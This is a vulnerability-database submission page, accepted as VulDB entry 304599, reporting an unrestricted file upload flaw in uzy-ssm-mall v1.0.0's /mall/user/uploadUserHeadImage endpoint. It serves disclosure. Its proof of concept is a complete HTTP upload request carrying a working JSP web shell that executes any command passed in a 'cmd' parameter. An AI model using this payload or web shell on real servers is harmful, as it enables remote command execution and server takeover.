Отправить #549259: ghostxbh uzy-ssm-mall v1.0.0 Unrestricted UploadИнформация

Названиеghostxbh uzy-ssm-mall v1.0.0 Unrestricted Upload
ОписаниеVulnerability Description In the uzy-ssm-mall v1.0.0 system, the /mall/user/uploadUserHeadImage interface has an arbitrary file upload vulnerability. Attackers can exploit this vulnerability to upload malicious files, thereby gaining server privileges. Vulnerability Location The vulnerability is located at the /mall/user/uploadUserHeadImage interface. Code Audit Process Vulnerability File Path / File Name: /mall/user/uploadUserHeadImage Cause of the Vulnerability: The code does not perform any validation on the uploaded files, allowing attackers to upload arbitrary files. Additionally, the system returns the filename of the uploaded file, which provides further convenience for attackers to exploit. Code Analysis: The code calls getUserId in multiple places to obtain the user's userid and uses userid for related CRUD operations. appid and mailid can be forged through enumeration, further increasing the exploitability of the vulnerability. POC: POST /mall/user/uploadUserHeadImage HTTP/1.1 Host: target-ip Cookie: [users'Cookie] Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 12345 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: application/octet-stream <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { out.println(line); } %> ------WebKitFormBoundary7MA4YWxkTrZu0gW--
Источник⚠️ https://wiki.shikangsi.com/post/share/2f5fafb5-63d3-4784-8866-5592547a71a4
Пользователь
 XingYue_Mstir (UID 72225)
Представление02.04.2025 11:54 (1 Год назад)
Модерация14.04.2025 00:36 (12 days later)
Статуспринято
Запись VulDB304599 [ghostxbh uzy-ssm-mall 1.0.0 uploadUserHeadImage Файл эскалация привилегий]
Баллы20

ПредыдущийОбзорДалее

Do you want to use VulDB in your project?

Use the official API to access entries easily!